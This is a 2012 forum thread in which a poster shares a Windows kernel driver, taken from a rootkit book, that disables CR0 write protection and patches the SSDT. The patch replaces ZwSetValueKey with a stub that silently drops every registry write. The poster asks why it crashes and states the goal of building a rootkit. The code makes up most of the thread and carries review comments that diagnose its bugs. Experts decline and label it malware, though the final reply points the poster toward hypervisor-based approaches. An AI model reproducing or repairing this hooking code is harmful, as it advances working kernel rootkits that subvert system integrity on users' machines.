Answered: Why does the PC crash when I start my driver?

  • Monday, August 20, 2012 3:40 PM
     

    Why does the PC crash when I start my driver?

    #include "ntddk.h"
    #include "datatype.h"
    #include "ssdt.h"
    //#include "zwsetvaluekey.c"
    //#include "hookssdt.c"
    //#include "modwp.c"
    /*
     * Extract the system-service index from the first instruction of a
     * Zw* export stub.  The caller passes the stub's entry address
     * (DriverEntry passes ZwSetValueKey); this returns the 32-bit value
     * that starts one byte past that address.  The layout only holds if
     * the stub begins with a one-byte opcode followed by a 32-bit
     * immediate (the 32-bit `mov eax, imm32` form the book targets); on
     * any other stub layout the result is garbage, and hookSSDT will index
     * the service table with it unchecked.
     * NOTE(review): this is an unaligned 4-byte read through a PULONG.
     * Tolerated on x86, but nothing validates the stub bytes first.
     */
    DWORD getSSDTIndex(BYTE* address)
    {
        PULONG immediate = (PULONG)(address + 1);
        return *immediate;
    }
    
    
    /*
     * Replace one SSDT slot and return the entry it previously held.
     *   apiCall   - address of the Zw* stub whose service index is read
     *               (via getSSDTIndex) to locate the slot.
     *   oldAddr   - despite the name, this is the handler WRITTEN into the
     *               slot; DriverEntry passes newZwSetValueKey here.
     *   callTable - base of the service table to patch.
     * Returns the previous slot contents (InterlockedExchange's return
     * value), which the caller keeps as oldZwSetValueKey.
     * NOTE(review): indexValue is used unchecked -- nothing compares it
     * against KeServiceDescriptorTable.nSystemCalls -- so a stub that does
     * not match getSSDTIndex's assumed layout turns this into an arbitrary
     * kernel write.  The exchange is atomic only with respect to the slot;
     * the page must already be writable when this runs (see disableWP_CR0),
     * and casting a pointer through LONG only round-trips on 32-bit.
     */
    BYTE* hookSSDT(BYTE* apiCall, BYTE* oldAddr , DWORD* callTable)
    {
    PLONG target;
    DWORD indexValue;
    /* Service index taken from the stub's immediate operand. */
    indexValue = getSSDTIndex(apiCall);
    /* Slot address; no bounds check against the table length. */
    target = (PLONG) &(callTable[indexValue]);
    /* Store the new handler and hand back the displaced one. */
    return((BYTE*)InterlockedExchange(target,(LONG) oldAddr));
    }
    /*
     * Prototype for the ntoskrnl export whose SSDT slot gets hooked.
     * NOTE(review): there is no return type here -- NTAPI is only the
     * calling-convention macro -- so this declares ZwSetValueKey as
     * returning int.  ntddk.h (included above) already declares it with
     * an NTSTATUS return, so this line is redundant and conflicts with
     * that declaration; it should simply be removed.
     */
    NTAPI ZwSetValueKey
    (IN HANDLE KeyHandle,
     IN PUNICODE_STRING ValueName,
     IN ULONG TitleIndex OPTIONAL,
     IN ULONG Type,
     IN PVOID Data,
     IN ULONG DataSize
    );
    /*
     * Function-pointer type matching ZwSetValueKey's parameter list, used
     * to hold the displaced SSDT entry.
     * NOTE(review): the pointer type carries no NTAPI (__stdcall), unlike
     * the real export.  The x86 kernel build's default convention (/Gz)
     * normally makes this match anyway -- confirm before ever calling
     * through it, or caller and callee will disagree on stack cleanup.
     */
    typedef NTSTATUS (*ZwSetValueKeyPtr)
    (
    IN HANDLE KeyHandle,
     IN PUNICODE_STRING ValueName,
     IN ULONG TitleIndex OPTIONAL,
     IN ULONG Type,
     IN PVOID Data,
     IN ULONG DataSize
     );
    /* Previous SSDT entry for ZwSetValueKey, saved by DriverEntry.
     * Nothing in this listing calls through it or restores it. */
    ZwSetValueKeyPtr oldZwSetValueKey;
    /*
     * Replacement installed in ZwSetValueKey's SSDT slot.  Once the hook is
     * in place, every NtSetValueKey system call on the machine arrives
     * here.  It writes nothing and never forwards to oldZwSetValueKey, yet
     * reports STATUS_SUCCESS: registry value writes from every process are
     * silently discarded for as long as the driver is loaded.  Even if the
     * SSDT patch itself succeeds, that is the system you end up with.
     * NOTE(review): like the ZwSetValueKeyPtr typedef, the definition
     * omits NTAPI and relies on the kernel build's default calling
     * convention matching what the system-service dispatcher expects.
     * Blindly answering "success" to a system call is exactly the
     * behaviour antivirus and Kernel Patch Protection are built to catch.
     */
    NTSTATUS newZwSetValueKey(
    IN HANDLE KeyHandle,
     IN PUNICODE_STRING ValueName,
     IN ULONG TitleIndex OPTIONAL,
     IN ULONG Type,
     IN PVOID Data,
     IN ULONG DataSize
    )
    {
    /* All six arguments ignored; the write is dropped, not performed. */
    return STATUS_SUCCESS;
    }
    /*
     * Result bundle from disableWP_MDL11: the MDL describing the service
     * table and the second kernel-space mapping it produced.
     *   callTable - whatever MmMapLockedPages returned; a NULL result is
     *               never checked by any caller in this listing.
     *   pMDL      - the MDL, which a clean unload would have to unmap and
     *               free; no code here does so.
     */
    typedef struct _WP_GLOBALS
    {
     BYTE* callTable;
     PMDL pMDL;
    }WP_GLOBALS;
    
    /*
     * Map the system service table through a second kernel virtual address
     * intended to be writable, so it can be patched without touching
     * CR0.WP (the "MDL method" from The Rootkit Arsenal).
     *   ssdt      - base of KiServiceTable.
     *   nServices - entry count; the byte length is nServices*4, i.e. this
     *               hard-codes 4-byte entries (the 32-bit layout).
     * Returns the MDL and the mapped alias in a WP_GLOBALS by value.
     * NOTE(review): several independent ways for this to bring the box down:
     *  - MmCreateMdl is obsolete (IoAllocateMdl is the documented API) and
     *    its result is not NULL-checked before MmBuildMdlForNonPagedPool
     *    dereferences it.
     *  - MdlFlags is poked directly to set MDL_MAPPED_TO_SYSTEM_VA before
     *    mapping.  MDL fields are documented as opaque; this is the book's
     *    trick, not a supported operation, and its effect is undefined.
     *  - MmMapLockedPages may raise on failure, its result is never
     *    checked, and the mapping is never released.
     *  - DriverEntry overwrites systemCallTable with the raw table address
     *    right after calling this, so the alias is never used for the
     *    write anyway -- the function only adds failure modes.
     */
    WP_GLOBALS disableWP_MDL11
    (
    DWORD* ssdt,
    DWORD nServices
    )
    {
    WP_GLOBALS wpGlobals;
    /* Describe nServices 4-byte entries starting at ssdt; may return NULL. */
    wpGlobals.pMDL = MmCreateMdl
    (
    NULL,
    (PVOID)ssdt,
    (SIZE_T)nServices*4
    );
    /* Dereferences pMDL unconditionally. */
    MmBuildMdlForNonPagedPool(wpGlobals.pMDL);
    /* Direct manipulation of an opaque MDL field (unsupported). */
    (*(wpGlobals.pMDL)).MdlFlags= (*(wpGlobals.pMDL)).MdlFlags | MDL_MAPPED_TO_SYSTEM_VA;
    /* Second mapping of the same physical pages; never unmapped. */
    wpGlobals.callTable= (BYTE*)MmMapLockedPages(wpGlobals.pMDL, KernelMode);
    return(wpGlobals);
    }
    
    /*
     * Clear CR0.WP (bit 16, mask 0xFFFEFFFF) on the CURRENT processor so
     * ring-0 writes to read-only pages -- here the service table -- stop
     * faulting.  EBX is saved and restored around the CR0 round trip.
     * NOTE(review): MSVC `__asm` blocks are x86-only; this file cannot be
     * built for x64 at all.
     * NOTE(review): CR0 is a per-processor register and is not part of the
     * per-thread context saved on a context switch.  Nothing in DriverEntry
     * raises IRQL or pins affinity between disableWP_CR0 and enableWP_CR0,
     * so on a multi-core machine the thread can be rescheduled onto a CPU
     * whose WP bit is still set before hookSSDT's store executes; that
     * store then page-faults at ring 0 and the system bugchecks.  This is
     * a very plausible cause of "the PC crashes when I start my driver".
     */
    void disableWP_CR0()
    {
    
    __asm
    {
    PUSH EBX
    MOV EBX,CR0
    AND EBX,0xFFFEFFFF
    MOV CR0, EBX
    POP EBX
    }
    return;
    }
    /*
     * Set CR0.WP (bit 16, mask 0x00010000) again on the CURRENT processor,
     * undoing disableWP_CR0.  EBX is saved and restored around the round trip.
     * NOTE(review): only meaningful if this runs on the same CPU that
     * cleared the bit.  If the thread migrated in between, this re-enables
     * WP on a CPU that never had it cleared and leaves the original CPU
     * running with write protection off until something else sets it.
     * x86-only (`__asm`), like its counterpart.
     */
    void enableWP_CR0()
    {
    __asm
    {
    PUSH EBX
    MOV EBX,CR0
    OR EBX,0x00010000
    MOV CR0,EBX
    POP EBX
    }
    return;
    }
    
    
    /*
     * KeServiceDescriptorTable: the kernel's service descriptor, imported
     * from ntoskrnl.  Only 32-bit ntoskrnl exports it; a 64-bit build has
     * no such import and the driver would fail to load.  SDE must already
     * be defined at this point (it comes from ssdt.h, whose contents
     * appear pasted at the bottom of this listing).
     * pMDL: copied out of disableWP_MDL11's result by DriverEntry and
     * never used again -- no unmap, no free.
     * systemCallTable: declared PVOID* but assigned BYTE* values; ends up
     * holding the raw KiServiceTable address, not the MDL alias.
     */
    __declspec(dllimport) SDE KeServiceDescriptorTable;
    PMDL pMDL;
    PVOID *systemCallTable;
    
    /*
     * Driver entry point.  Installs the ZwSetValueKey SSDT hook and returns
     * STATUS_SUCCESS unconditionally.  theRegistryPath is unused and
     * pDriverObject is never touched: no DriverUnload is registered, so the
     * driver cannot be unloaded and the hook stays until reboot.  (If an
     * unload routine is ever added it MUST restore oldZwSetValueKey first,
     * or the slot points into a freed image.)
     *
     * Why this is a crash waiting to happen, in execution order:
     *  1. disableWP_MDL11's result is used without any NULL/failure check.
     *  2. The mapped alias stored in systemCallTable is immediately
     *     overwritten with the raw KiServiceTable address, so the MDL work
     *     is discarded and the patch goes through the original read-only
     *     mapping, relying purely on CR0.WP being clear.
     *  3. CR0.WP is cleared on whichever CPU happens to run this, at
     *     PASSIVE_LEVEL with no affinity; a preemption before hookSSDT's
     *     store can land the write on another CPU with WP set, which
     *     faults in ring 0 and bugchecks.
     *  4. hookSSDT trusts getSSDTIndex's read of the stub and indexes the
     *     table without a bounds check against nSystemCalls.
     *  5. If the patch does succeed, every registry write on the machine is
     *     swallowed by newZwSetValueKey.  On x64 this design is moot:
     *     KeServiceDescriptorTable is not exported, `__asm` does not build,
     *     and Kernel Patch Protection bugchecks (0x109) on a modified SSDT.
     */
    NTSTATUS DriverEntry
    (
    IN PDRIVER_OBJECT pDriverObject,
    IN PUNICODE_STRING theRegistryPath
    )
    {
    
    /* Build the MDL alias of the service table (result unchecked). */
    WP_GLOBALS wpGlobals = disableWP_MDL11(KeServiceDescriptorTable.KiServiceTable,KeServiceDescriptorTable.nSystemCalls);
    pMDL = wpGlobals.pMDL;
    systemCallTable = wpGlobals.callTable;
    /* Per-CPU WP clear; no IRQL raise or affinity pin follows. */
    disableWP_CR0();
    /* Overwrites the alias obtained above; the MDL mapping is now unused. */
    systemCallTable= (BYTE*)KeServiceDescriptorTable.KiServiceTable;
    /* Swap the slot: newZwSetValueKey goes in, the original comes back. */
    oldZwSetValueKey = (ZwSetValueKeyPtr)hookSSDT
    (
    (BYTE*)ZwSetValueKey,
    (BYTE*)newZwSetValueKey,
    (DWORD*)systemCallTable
    );
    enableWP_CR0();
    return STATUS_SUCCESS;
    }
    
    /*
     * The lines below look like the bodies of datatype.h and ssdt.h
     * (included at the top) pasted after the driver source.  If they were
     * really part of this file in this position it would not compile:
     * DWORD, BYTE and SDE are all used above before these definitions.
     */
    typedef unsigned long DWORD;   /* 32-bit on both x86 and x64 Windows */
    typedef unsigned short WORD;
    typedef unsigned char BYTE;

    /* One KeServiceDescriptorTable entry, 32-bit picture: KiServiceTable is
     * treated as an array of 4-byte entries (which is why disableWP_MDL11
     * sizes it as nServices*4).  With every member already 4 bytes on x86,
     * pack(1) changes nothing here. */
    #pragma pack(1)
    typedef struct ServiceDescriptorEntry
    {
     DWORD *KiServiceTable;     /* the dispatch table that gets patched */
     DWORD *CounterBaseTable;   /* not referenced by this driver */
     DWORD nSystemCalls;        /* entry count of KiServiceTable */
     DWORD *KiArgumentTable;    /* not referenced by this driver */
    }SDE, *PSDE;
    #pragma pack()
    /* Four descriptors; this type is not referenced anywhere in the listing. */
    typedef struct ServiceDescriptorTable
    {
    SDE ServiceDescriptor[4];
    
    }SDT;


All Replies

  • Monday, August 20, 2012 3:46 PM
     

    You do realize that even if you successfully get past this phase you are just going to crash on the hooking.  It is extremely hard to do hooking correctly (all known examples of anything but the most trivial hooks have bugs in them), and you can't do it on 64-bit Windows at all: Kernel Patch Protection (PatchGuard) bugchecks the machine when it detects a modified service table, and the table is not exported there in the first place.

    Why are you hooking in the first place, i.e. what problem are you trying to solve?  Hooking just means your driver will be flagged (correctly) as MALWARE.


    Don Burn Windows Filesystem and Driver Consulting Website: http://www.windrvr.com Blog: http://msmvps.com/blogs/WinDrvr

  • Monday, August 20, 2012 5:05 PM
     
     

    You do realize that even if you successfully get past this phase you are just going to crash on the hooking.  It is extremely hard to do hooking correctly (all known examples of anything but the most trivial hooks have bugs in them), and you can't do it on 64-bit Windows at all: Kernel Patch Protection (PatchGuard) bugchecks the machine when it detects a modified service table, and the table is not exported there in the first place.

    Why are you hooking in the first place, i.e. what problem are you trying to solve?  Hooking just means your driver will be flagged (correctly) as MALWARE.


    Don Burn Windows Filesystem and Driver Consulting Website: http://www.windrvr.com Blog: http://msmvps.com/blogs/WinDrvr

    http://www.amazon.com/The-Rootkit-Arsenal-Evasion-Corners/dp/1598220616

    This explains everything. I want to do the SSDT hooking example from the book.

    And why does it crash?



  • Monday, August 20, 2012 5:16 PM
     
     

    Yes, the book's code was poor when it was published, and since then it has gotten worse as the kernel has changed.  Why do you believe hooking will help you in any way?


    Don Burn Windows Filesystem and Driver Consulting Website: http://www.windrvr.com Blog: http://msmvps.com/blogs/WinDrvr

  • Monday, August 20, 2012 6:33 PM
     
     
    Then how do I take over the machine?
  • Monday, August 20, 2012 7:32 PM
     
     
    You don't. That is exactly the point: it shouldn't be done. What problem are you trying to solve? There are probably much better ways to do it.

    d -- This posting is provided "AS IS" with no warranties, and confers no rights.

  • Monday, August 20, 2012 7:34 PM
     
     
    I want to make a rootkit. Is a filter driver a good idea?
  • Monday, August 20, 2012 7:37 PM
     
     

    So you are publicly asking how to create illegal malicious software?  And you expect us to help?


    Don Burn Windows Filesystem and Driver Consulting Website: http://www.windrvr.com Blog: http://msmvps.com/blogs/WinDrvr

  • Monday, August 20, 2012 7:39 PM
     
     
    Yes and yes. Since I found the book "The Rootkit Arsenal" I want to create my own rootkit.
  • Monday, August 20, 2012 8:04 PM
     
     

    It is outdated. Read up on hypervisors and on platform features such as Intel Active Management Technology (AMT). And this.

    -- pa